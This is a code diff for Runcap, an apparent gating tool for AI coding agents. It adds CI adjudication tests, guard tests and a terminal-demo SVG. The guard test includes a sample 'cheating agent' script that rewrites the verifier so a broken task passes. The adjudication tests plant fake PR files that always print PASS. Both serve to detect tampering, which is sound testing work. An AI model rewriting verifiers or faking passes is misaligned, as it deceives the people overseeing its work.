|
+
const binHuman = runBin(["--base", BASE, "--head", HEAD_VERIFIER]);
|
|
264
|
+
check("`runcap ci --mode adjudicate` exits 0 on HUMAN_APPROVAL_REQUIRED (success/neutral)", binHuman.code === 0, `code=${binHuman.code}`);
|
|
265
|
+
check("HUMAN run prints the human-gate verdict", /Verdict:\s+HUMAN_APPROVAL_REQUIRED/.test(binHuman.stdout), binHuman.stdout.slice(-300));
|
|
266
|
+
|
|
267
|
+
// --- 19. the real bin writes a PR step summary ------------------------------
|
|
268
|
+
const summaryFile = path.join(tmp, "step-summary.md");
|
|
269
|
+
writeFileSync(summaryFile, "");
|
|
270
|
+
runBin(["--base", BASE, "--head", HEAD_REPLAYFAIL], { GITHUB_STEP_SUMMARY: summaryFile });
|
|
271
|
+
const summary = readFileSync(summaryFile, "utf8");
|
|
272
|
+
check("bin writes a PR summary to GITHUB_STEP_SUMMARY", /Runcap CI adjudication: BLOCKED/.test(summary), summary.slice(0, 160));
|
|
273
|
+
|
|
274
|
+
// --- 20. exitCodeFor maps the three states correctly ------------------------
|
|
275
|
+
check("exitCodeFor PASS=0 / HUMAN=0 / BLOCKED=1",
|
|
276
|
+
exitCodeFor("PASS") === 0 && exitCodeFor("HUMAN_APPROVAL_REQUIRED") === 0 && exitCodeFor("BLOCKED") === 1);
|
|
277
|
+
|
|
278
|
+
// --- 21. the reference workflow is least-privilege AND a proof gate ----------
|
|
279
|
+
// The consumer reference is a TEMPLATE under examples/ (not an active workflow
|
|
280
|
+
// in this repo), because Runcap's own repo has no base policy to self-adjudicate
|
|
281
|
+
// and, more importantly, the judge must never be code from the candidate PR.
|
|
282
|
+
const wfPath = path.join(REPO_ROOT, "examples", "runcap-adjudicate.yml");
|
|
283
|
+
const wfRaw = readFileSync(wfPath, "utf8");
|
|
284
|
+
// Assert on the effective YAML directives, not the explanatory comments. The
|
|
285
|
+
// header documents what the workflow must NOT do (and so legitimately contains
|
|
286
|
+
// strings like "pull_request_target"); strip comments so the safety checks see
|
|
287
|
+
// only the real instructions. Inline `# v4.3.1` after a SHA is stripped too,
|
|
288
|
+
// which is harmless because the SHA precedes the `#`.
|
|
289
|
+
const wfText = wfRaw.split("\n").map((line) => line.replace(/#.*$/, "")).join("\n");
|
|
290
|
+
check("reference workflow triggers on pull_request (not pull_request_target)",
|
|
291
|
+
/on:\s*\n\s*pull_request:/.test(wfText) && !/pull_request_target/.test(wfText), "trigger");
|
|
292
|
+
check("reference workflow grants only contents: read", /permissions:\s*\n\s*contents:\s*read/.test(wfText) && !/id-token/.test(wfText) && !/write/.test(wfText.replace(/contents:\s*read/g, "")), "permissions");
|
|
293
|
+
check("reference workflow caps runtime (timeout-minutes: 10)", /timeout-minutes:\s*10/.test(wfText));
|
|
294
|
+
check("reference workflow uses no `needs:` (self-sufficient required gate)", !/\n\s*needs:/.test(wfText));
|
|
295
|
+
|
|
296
|
+
// Proof-gate hardening: the judge must NOT be PR-workspace code.
|
|
297
|
+
check("reference workflow never executes PR-workspace `node ./bin/runcap.mjs`", !/node\s+\.\/bin\/runcap\.mjs/.test(wfText), "executes workspace code");
|
|
298
|
+
check("reference workflow never uses a local action (`uses: ./`)", !/uses:\s*\.\//.test(wfText), "local action");
|
|
299
|
+
check("reference workflow never runs `npm ci`/`npm install` of the PR manifest", !/npm\s+(ci|install)/.test(wfText), "PR-workspace install");
|
|
300
|
+
check("reference workflow sets persist-credentials: false (never true)", /persist-credentials:\s*false/.test(wfText) && !/persist-credentials:\s*true/.test(wfText), "persist-credentials");
|
|
301
|
+
// Every `uses:` must be pinned to a full 40-hex commit SHA, never a floating tag.
|
|
302
|
+
const usesRefs = [...wfText.matchAll(/uses:\s*([^\s#]+)/g)].map((m) => m[1]);
|
|
303
|
+
check("reference workflow pins every action by a full 40-char commit SHA (no @v4/@v1 tags)",
|
|
304
|
+
usesRefs.length > 0 && usesRefs.every((u) => /@[0-9a-f]{40}$/.test(u)), JSON.stringify(usesRefs));
|
|
305
|
+
check("reference workflow's judge is the released Runcap action, not workspace code",
|
|
306
|
+
/uses:\s*kirder24-code\/ai-agent-manager@[0-9a-f]{40}/.test(wfText) && /mode:\s*adjudicate/.test(wfText), "released action judge");
|
|
307
|
+
|
|
308
|
+
// --- 22. the judge is the adjudicator's OWN code, not the PR's bin -----------
|
|
309
|
+
// A head PR that rewrites bin/runcap.mjs to always print PASS, or rewrites
|
|
310
|
+
// src/adjudicate.mjs, cannot change the verdict, because the adjudicator we run
|
|
311
|
+
// is THIS repo's module/bin (the released-action analogue), never the head copy.
|
|
312
|
+
const HEAD_FAKE_BIN = makeHead("h-fake-bin", () => {
|
|
313
|
+
w("app/broken.mjs", "export const ok = false; // still broken\n");
|
|
314
|
+
mkdirSync(path.join(tmp, "bin"), { recursive: true });
|
|
315
|
+
w("bin/runcap.mjs", "#!/usr/bin/env node\nconsole.log('Verdict: PASS'); process.exit(0);\n");
|
|
316
|
+
});
|
|
317
|
+
const fakeBin = await adj(BASE, HEAD_FAKE_BIN);
|
|
318
|
+
check("head PR rewriting bin/runcap.mjs to fake PASS is still BLOCKED by the trusted adjudicator",
|
|
319
|
+
fakeBin.verdict === "BLOCKED", JSON.stringify(fakeBin.reasons));
|
|
320
|
+
// And via the REAL trusted bin (this repo's, analogue of the pinned released action):
|
|
321
|
+
const fakeBinReal = runBin(["--base", BASE, "--head", HEAD_FAKE_BIN]);
|
|
322
|
+
check("trusted `runcap ci --mode adjudicate` exits 1 on a fake-PASS head bin", fakeBinReal.code === 1, `code=${fakeBinReal.code}`);
|
|
323
|
+
|
|
324
|
+
const HEAD_FAKE_ADJ = makeHead("h-fake-adj", () => {
|
|
325
|
+
w("app/broken.mjs", "export const ok = false; // still broken\n");
|
|
326
|
+
mkdirSync(path.join(tmp, "src"), { recursive: true });
|
|
327
|
+
w("src/adjudicate.mjs", "export async function adjudicate(){return {verdict:'PASS',reasons:[]};}\nexport function exitCodeFor(){return 0;}\nexport function formatAdjudication(){return ['Verdict: PASS'];}\n");
|
|
328
|
+
});
|
|
329
|
+
const fakeAdj = await adj(BASE, HEAD_FAKE_ADJ);
|
|
330
|
+
check("head PR rewriting src/adjudicate.mjs is still BLOCKED (we never import the head copy)",
|
|
331
|
+
fakeAdj.verdict === "BLOCKED", JSON.stringify(fakeAdj.reasons));
|
|
332
|
+
|
|
333
|
+
console.log("\n" + (failures === 0 ? "ALL ADJUDICATE TESTS PASSED" : `${failures} ADJUDICATE TEST(S) FAILED`));
|
|
334
|
+
process.exit(failures === 0 ? 0 : 1);
|
|
@@ -0,0 +1,76 @@
|
|
|
1
|
+
// Proves `runcap outcome --guard` grades verification trust, not just pass/fail.
|
|
2
|
+
// Three real runs through the cap gateway (mock upstream) inside a throwaway git
|
|
3
|
+
// repo: an honest fix earns VERIFIED_STRONG; an agent that rewrites the verifier
|
|
4
|
+
// to force a green earns VERIFIER_COMPROMISED; a no-fix run stays UNVERIFIED.
|
|
5
|
+
// The whole point of the guard is that the middle case must NOT read as VERIFIED.
|
|
6
|
+
|
|
7
|
+
import os from "node:os";
|
|
8
|
+
import path from "node:path";
|
|
9
|
+
import { fileURLToPath } from "node:url";
|
|
10
|
+
import { execFileSync } from "node:child_process";
|
|
11
|
+
import { mkdtempSync, writeFileSync, mkdirSync } from "node:fs";
|
|
12
|
+
|
|
13
|
+
const SRC_DIR = process.env.RUNCAP_SRC ?? path.join(path.dirname(fileURLToPath(import.meta.url)), "..", "src");
|
|
14
|
+
|
|
15
|
+
const tmp = mkdtempSync(path.join(os.tmpdir(), "runcap-guard-"));
|
|
16
|
+
process.chdir(tmp);
|
|
17
|
+
|
|
18
|
+
mkdirSync(path.join(tmp, "app"), { recursive: true });
|
|
19
|
+
// broken.mjs starts wrong (ok=false), so the task genuinely fails on baseline.
|
|
20
|
+
writeFileSync(path.join(tmp, "app", "broken.mjs"), "export const ok = false;\n");
|
|
21
|
+
writeFileSync(path.join(tmp, "app", "verify.mjs"),
|
|
22
|
+
"import { ok } from './broken.mjs'; import assert from 'node:assert'; assert.strictEqual(ok, true, 'not fixed'); console.log('ok');\n");
|
|
23
|
+
|
|
24
|
+
// Honest agent: spends, then fixes the source file (an allowed change).
|
|
25
|
+
writeFileSync(path.join(tmp, "agent-fix.mjs"),
|
|
26
|
+
"const b=process.env.OPENAI_BASE_URL;await fetch(`${b}/chat/completions`,{method:'POST',headers:{'content-type':'application/json',authorization:'Bearer x'},body:JSON.stringify({model:'gpt-4o',messages:[{role:'user',content:'fix it'}]})}).then(r=>r.text());" +
|
|
27
|
+
"const {writeFile}=await import('node:fs/promises');await writeFile('app/broken.mjs','export const ok = true;\\n');\n");
|
|
28
|
+
// Cheating agent: instead of fixing the bug, it rewrites the VERIFIER so it always passes.
|
|
29
|
+
writeFileSync(path.join(tmp, "agent-cheat.mjs"),
|
|
30
|
+
"const b=process.env.OPENAI_BASE_URL;await fetch(`${b}/chat/completions`,{method:'POST',headers:{'content-type':'application/json',authorization:'Bearer x'},body:JSON.stringify({model:'gpt-4o',messages:[{role:'user',content:'cheat'}]})}).then(r=>r.text());" +
|
|
31
|
+
"const {writeFile}=await import('node:fs/promises');await writeFile('app/verify.mjs','console.log(\"ok\");\\n');\n");
|
|
32
|
+
// No-fix agent: spends, changes nothing.
|
|
33
|
+
writeFileSync(path.join(tmp, "agent-nop.mjs"),
|
|
34
|
+
"const b=process.env.OPENAI_BASE_URL;await fetch(`${b}/chat/completions`,{method:'POST',headers:{'content-type':'application/json',authorization:'Bearer x'},body:JSON.stringify({model:'gpt-4o',messages:[{role:'user',content:'think'}]})}).then(r=>r.text());console.log('no fix');\n");
|
|
35
|
+
|
|
36
|
+
// Commit a baseline so the guard has a real commit + clean tree to check against.
|
|
37
|
+
const g = (...a) => execFileSync("git", a, { cwd: tmp, stdio: "pipe" });
|
|
38
|
+
g("init", "-q");
|
|
39
|
+
g("config", "user.email", "test@runcap.local");
|
|
40
|
+
g("config", "user.name", "runcap-test");
|
|
41
|
+
g("add", "-A");
|
|
42
|
+
g("commit", "-qm", "baseline");
|
|
43
|
+
|
|
44
|
+
let failures = 0;
|
|
45
|
+
// Report a single assertion: count it in the shared `failures` tally when it
// did not pass, then print one PASS/FAIL line (with the detail appended after
// an em dash when a non-empty detail is supplied).
const check = (name, pass, detail) => {
  if (!pass) {
    failures++;
  }
  const verdict = pass ? "PASS" : "FAIL";
  const suffix = detail ? " — " + detail : "";
  console.log(`${verdict} ${name}${suffix}`);
};
|
|
46
|
+
|
|
47
|
+
const { runOutcome } = await import(path.join(SRC_DIR, "mission-control.mjs"));
|
|
48
|
+
|
|
49
|
+
// Each scenario must start from the committed baseline - otherwise one run's
|
|
50
|
+
// edits (especially the cheat run's rewritten verifier) leak into the next.
|
|
51
|
+
// Restore the working tree between scenarios: force-checkout HEAD, then clean
// untracked files and directories while excluding `.runcap`.
const resetToBaseline = () => {
  const gitSteps = [
    ["checkout", "-f", "HEAD"],
    ["clean", "-fdq", "-e", ".runcap"],
  ];
  for (const stepArgs of gitSteps) {
    g(...stepArgs);
  }
};
|
|
52
|
+
|
|
53
|
+
// 1. Honest fix, guarded → VERIFIED_STRONG.
|
|
54
|
+
const fix = await runOutcome({ task: "fix ok", verify: "node app/verify.mjs", command: ["node", "agent-fix.mjs"], label: "guard-fix", mock: true, guard: true, allow: ["app/broken.mjs"] });
|
|
55
|
+
check("honest fix verifies (exit-code oracle)", fix.receipt.outcome === "VERIFIED", `outcome=${fix.receipt.outcome}`);
|
|
56
|
+
check("honest fix grades VERIFIED_STRONG", fix.receipt.verificationIntegrity.status === "VERIFIED_STRONG", `status=${fix.receipt.verificationIntegrity.status}`);
|
|
57
|
+
check("strong run reproduced the baseline failure first", fix.receipt.verificationIntegrity.contract.baselineVerifyPassed === false);
|
|
58
|
+
check("strong pass survives a clean checkout", fix.receipt.verificationIntegrity.cleanRoom.passed === true, fix.receipt.verificationIntegrity.cleanRoom.detail);
|
|
59
|
+
|
|
60
|
+
// 2. Cheat by rewriting the verifier → still exit-0 "VERIFIED", but COMPROMISED.
|
|
61
|
+
resetToBaseline();
|
|
62
|
+
const cheat = await runOutcome({ task: "fix ok", verify: "node app/verify.mjs", command: ["node", "agent-cheat.mjs"], label: "guard-cheat", mock: true, guard: true, allow: ["app/broken.mjs"] });
|
|
63
|
+
check("cheat run's exit code is still 0 (the trap)", cheat.receipt.verify.passed === true);
|
|
64
|
+
check("guard catches the rewritten verifier", cheat.receipt.verificationIntegrity.status === "VERIFIER_COMPROMISED", `status=${cheat.receipt.verificationIntegrity.status}`);
|
|
65
|
+
check("compromised run names the tampered file", cheat.receipt.verificationIntegrity.violations.some((v) => v.startsWith("verifier_file_unchanged:")), JSON.stringify(cheat.receipt.verificationIntegrity.violations));
|
|
66
|
+
|
|
67
|
+
// 3. No-fix, guarded → UNVERIFIED (verify never passed).
|
|
68
|
+
resetToBaseline();
|
|
69
|
+
const nop = await runOutcome({ task: "fix ok", verify: "node app/verify.mjs", command: ["node", "agent-nop.mjs"], label: "guard-nop", mock: true, guard: true, allow: ["app/broken.mjs"] });
|
|
70
|
+
check("no-fix guarded run is UNVERIFIED", nop.receipt.verificationIntegrity.status === "UNVERIFIED", `status=${nop.receipt.verificationIntegrity.status}`);
|
|
71
|
+
|
|
72
|
+
// 4. The honesty note about cost scope rides on every guarded receipt.
|
|
73
|
+
check("receipt states cost scope is LLM-only", /subscriptions/.test(fix.receipt.costScope.note));
|
|
74
|
+
|
|
75
|
+
console.log("\n" + (failures === 0 ? "ALL GUARD TESTS PASSED" : `${failures} GUARD TEST(S) FAILED`));
|
|
76
|
+
process.exit(failures === 0 ? 0 : 1);
|
|
@@ -15,29 +15,29 @@ const C = {
|
|
|
15
15
|
};
|
|
16
16
|
|
|
17
17
|
const lines = [
|
|
18
|
-
{ t: "$ runcap
|
|
19
|
-
{ t: "
|
|
20
|
-
{ t: "
|
|
21
|
-
{ t: "", c: C.text, at: 1.5 },
|
|
22
|
-
{ t: "
|
|
23
|
-
{ t: "
|
|
24
|
-
{ t: "
|
|
25
|
-
{ t: "", c: C.
|
|
26
|
-
{ t: "
|
|
27
|
-
{ t: "
|
|
28
|
-
{ t: "", c: C.
|
|
29
|
-
{ t: "
|
|
30
|
-
{ t: "
|
|
31
|
-
{ t: "", c: C.
|
|
32
|
-
{ t: "
|
|
33
|
-
{ t: "
|
|
18
|
+
{ t: "$ runcap mission run --policy .runcap/mission.yaml -- claude \"fix the failing checkout test\"", c: C.prompt, at: 0.3 },
|
|
19
|
+
{ t: "Policy: checkout · team payments · cap $10 · verify \"npm test\"", c: C.dim, at: 0.9 },
|
|
20
|
+
{ t: "", c: C.text, at: 1.0 },
|
|
21
|
+
{ t: "→ estimate $3 - $7 · hard cap armed at $10", c: C.text, at: 1.5 },
|
|
22
|
+
{ t: "→ compressed 1,186 → 737 tokens on a real call (37.9% saved)", c: C.ok, at: 2.1 },
|
|
23
|
+
{ t: "", c: C.text, at: 2.2 },
|
|
24
|
+
{ t: "✓ verify passed - but did the agent earn it?", c: C.text, at: 2.9 },
|
|
25
|
+
{ t: " · verifier unchanged · baseline truly failed · clean-room replay reproduced", c: C.dim, at: 3.4 },
|
|
26
|
+
{ t: " Verification integrity: VERIFIED_STRONG", c: C.ok, at: 4.0 },
|
|
27
|
+
{ t: " Mission cost $0.0007 / $10.00 · 3 files changed, all in scope", c: C.text, at: 4.6 },
|
|
28
|
+
{ t: " Mission verdict: PASS", c: C.accent, at: 5.2 },
|
|
29
|
+
{ t: "", c: C.text, at: 5.3 },
|
|
30
|
+
{ t: "$ runcap ci --policy .runcap/mission.yaml # the same gate, on the PR", c: C.prompt, at: 6.2 },
|
|
31
|
+
{ t: "✗ agent rewrote app/verify.mjs - protected evidence changed", c: C.bad, at: 6.9 },
|
|
32
|
+
{ t: " Verification integrity: VERIFIER_COMPROMISED", c: C.bad, at: 7.5 },
|
|
33
|
+
{ t: " Mission verdict: BLOCKED → PR check fails, run stopped", c: C.bad, at: 8.1 }
|
|
34
34
|
];
|
|
35
35
|
|
|
36
|
-
const W =
|
|
36
|
+
const W = 980, H = 588;
|
|
37
37
|
const padX = 28, top = 78, lh = 27, fs = 16.5;
|
|
38
38
|
// Escape the XML-significant characters so a line's text can be embedded in an
// SVG <text> node without being parsed as markup. `&` is handled first so the
// entities emitted for `<` and `>` are not escaped a second time.
const esc = (s) => s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
|
|
39
39
|
|
|
40
|
-
const total =
|
|
40
|
+
const total = 11.0; // loop length seconds
|
|
41
41
|
const rows = lines.map((ln, i) => {
|
|
42
42
|
const y = top + i * lh;
|
|
43
43
|
// fade+slide in at ln.at, hold, then reset at end of loop
|
|
@@ -47,7 +47,7 @@ const rows = lines.map((ln, i) => {
|
|
|
47
47
|
${esc(ln.t)}</text>`;
|
|
48
48
|
}).join("\n");
|
|
49
49
|
|
|
50
|
-
const svg = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 ${W} ${H}" width="${W}" height="${H}" role="img" aria-label="Runcap terminal demo:
|
|
50
|
+
const svg = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 ${W} ${H}" width="${W}" height="${H}" role="img" aria-label="Runcap terminal demo: estimate, cap, verify integrity, mission PASS, then a tampered run graded BLOCKED on the PR">
|
|
51
51
|
<defs>
|
|
52
52
|
<linearGradient id="brand" x1="0" y1="0" x2="1" y2="0">
|
|
53
53
|
<stop offset="0" stop-color="#22d3ee"/><stop offset="1" stop-color="#34d399"/>
|
|
@@ -65,7 +65,7 @@ const svg = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 ${W} ${H}" wid
|
|
|
65
65
|
<circle cx="26" cy="28" r="6" fill="#f87171"/>
|
|
66
66
|
<circle cx="48" cy="28" r="6" fill="#fbbf24"/>
|
|
67
67
|
<circle cx="70" cy="28" r="6" fill="#34d399"/>
|
|
68
|
-
<text x="100" y="33" fill="#8a8a8a" font-family="'JetBrains Mono',monospace" font-size="14">runcap · estimate · cap ·
|
|
68
|
+
<text x="100" y="33" fill="#8a8a8a" font-family="'JetBrains Mono',monospace" font-size="14">runcap · estimate · cap · verify integrity · mission verdict</text>
|
|
69
69
|
<text x="${W-150}" y="33" fill="url(#brand)" font-family="'JetBrains Mono',monospace" font-weight="700" font-size="15">run·cap</text>
|
|
70
70
|
</g>
|
|
71
71
|
<line x1="0" y1="50" x2="${W}" y2="50" stroke="#1c1c1f"/>
|